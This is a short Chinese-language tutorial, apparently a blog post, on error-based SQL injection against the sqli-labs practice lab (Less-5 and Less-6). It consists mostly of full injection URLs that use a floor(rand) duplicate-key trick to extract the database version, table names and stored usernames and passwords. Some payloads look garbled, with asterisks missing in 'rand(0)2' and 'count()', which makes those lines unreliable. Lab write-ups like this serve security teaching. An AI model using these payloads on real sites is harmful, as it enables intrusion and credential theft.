报错注入

简介: 报错注入

环境sqli-labs

less 5

1、我们随便输入’,看到报错信息

0a2653c851af460fa595bd959398a8f1.png

可以判断,需要单引号闭合

2、构造查询获取数据库名称语句

http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor (rand(0)2))x from information_schema.tables group by x)a --+

0eacb84100b54626af849e6b562bf92a.png

3、获取表名语句

http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor (rand(0)2))x from information_schema.tables group by x)a --+

2d65d23f6d4748949b924e4057485923.png

4、获取用户信息

http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a)from security.users limit 2,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

2e9b90b2ca334476abebe75bafe6eeaa.png

less 6

双引号闭合,和上面方法相同

禁止非法,后果自负

目录
相关文章
|
6月前
|
XML 安全 数据库
24、显错注入(updatexml和extractvalue)
24、显错注入(updatexml和extractvalue)
52 0
|
25天前
|
SQL 安全 关系型数据库
beescms注入
通过 SQL 注入、弱口令爆破和文件上传三种方式对系统进行安全测试的过程。首先,通过手动注入和报错注入获取数据库信息,接着利用弱口令爆破工具尝试登录,最后通过修改 MIME 类型绕过文件上传限制,成功获取 shell。
beescms注入
|
5天前
|
SQL 关系型数据库 MySQL
注入
【11月更文挑战第17天】
14 4
|
6月前
|
关系型数据库 MySQL
Mysql注入 -- 注入类型
Mysql注入 -- 注入类型
44 1
|
6月前
|
数据库
13、报错注入(Get)
13、报错注入(Get)
30 0
|
6月前
|
SQL 关系型数据库 MySQL
注入工具 -- sqlmap(注入参数)
注入工具 -- sqlmap(注入参数)
106 0
|
6月前
|
安全 关系型数据库 MySQL
Mysql注入 -- 报错注入
Mysql注入 -- 报错注入
51 0
|
数据库
报错注入
报错注入
114 0
报错注入
|
XML Java 数据格式
SpringXML实现注入
SpringXML实现注入
SpringXML实现注入
|
XML SQL 关系型数据库